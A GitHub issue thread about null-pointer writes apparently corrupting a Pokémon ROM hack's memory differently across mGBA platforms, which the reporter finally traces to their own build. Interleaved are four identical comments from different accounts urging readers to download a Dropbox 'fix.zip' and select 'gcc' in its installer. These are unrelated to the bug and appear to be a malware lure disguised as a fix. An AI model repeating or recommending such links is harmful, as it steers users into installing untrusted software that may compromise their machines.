### ISSUE TITLE
Null handling differs between Windows/x86 and OSX/ARM

### ISSUE THREAD

**Issue by Mawootad** [mgba-emu/mgba#3280]
Writes to null addresses seems to differ between x86 (Windows/Linux) and ARM (OSX/iOS). Found in our Pokemon romhack where a bugged write to a null ptr caused memory corruption on mGBA engines from users on Mac but not on mGBA on Windows or Linux. Given that this is UB it seems that most likely this is due to some difference in compilation/interpretation to ASM between x86 and ARM. Not super important, but figured I should mention as it's probably not ideal for different versions of the emulator to behave differently.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by endrift** [comment]
Writing to null shouldn't do _anything_ on GBA. Is this a GBA ROM hack? I'm gonna need more info. Also some example code.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mawootad** [comment]
This is the method that was called with null that resulted in corruption on OSX and iPhone:
[static void DestroyBoxMonIcon(struct Sprite *sprite) is ](https://github.com/Elite-Redux/eliteredux/blob/5f730d8835f3c96d15195f2ac9f126981c3a331b/src/pokemon_storage_system.c#L5227)

**Comment by endrift** [comment]
iPhone? There's no port of mGBA to iPhone, unless you're using the outdated core that RA ships.

Also please give me an actual patch I can use to call that and show what the heck that actual corruption is. "Corruption" is extremely vague.

**Comment by Mawootad** [comment]
I can provide a ROM and save file as well to test with if you'd like, along with instructions for reproducing, but I'm not sure exactly how to correctly share the rom. I can link to our patcher or can maybe DM somehow if there's a way to do that, but assume that posting a full Pokemon Emerald ROM (even if it is a hack) is somewhat verboten.

**Comment by endrift** [comment]
Yeah, posting a whole ROM is indeed forbidden, but just sending me a patch file and reproduction steps should be sufficient.

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mawootad** [comment]
Online patcher (expected ROM is Pokémon Emerald >> 1986 - Pokemon Emerald (U)):
https://elite-redux.com/

Save file:
[pokeemerald_modern.zip](https://github.com/user-attachments/files/16742601/pokeemerald_modern.zip)

Steps to reproduce:
Open start menu
Choose PC
Close PC
Trainer name should be corrupted

**Comment by endrift** [comment]
Thanks, I'll take a look when I have time.

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mawootad** [comment]
Oh hey, sorry for this but seems like this does happen on Windows and Linux (I had been testing on what I thought was the ROM we were patching to but that seems to potentially not be the same) so seems to potentially have been some weird build issue on our end? May still be an emulation inaccuracy if null ptr writes should have no effect but also likely some secondary issue on our end related to a bad build.

**Comment by endrift** [comment]
yeah, it seems more likely to be an issue on your end, but let me know if you narrow it down further.
